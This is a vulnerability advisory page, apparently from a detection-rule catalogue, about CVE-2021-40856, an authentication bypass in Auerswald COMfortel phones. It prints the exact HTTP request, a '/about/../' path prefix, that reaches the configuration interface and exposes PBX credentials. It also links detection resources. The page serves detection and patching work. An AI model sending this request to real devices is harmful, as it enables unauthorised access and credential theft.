🔙 목록으로 돌아가기

CVE-2021-40856: Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass

TitleAuerswald COMfortel 1400/2600/3600 IP - Authentication Bypass
Authorgy741
SeverityHigh
ImpactAn attacker can bypass authentication and gain unauthorized access to the device.
RemediationApply the latest firmware update provided by Auerswald to fix the authentication bypass vulnerability.
CVSS Score7.5
EPSS Score0.8812
CVE IDCVE-2021-40856
CWE IDCWE-706
Tags cve2021 cve packetstorm comfortel auth-bypass auerswald vkev vuln

🔍 Vulnerability Description

Auerswald COMfortel 1400/2600/3600 IP is susceptible to an authentication bypass vulnerability. Inserting the prefix “/about/../” allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data.

🌐 HTTP Request

GET /about/../tree?action=get HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-40856.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-40856.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A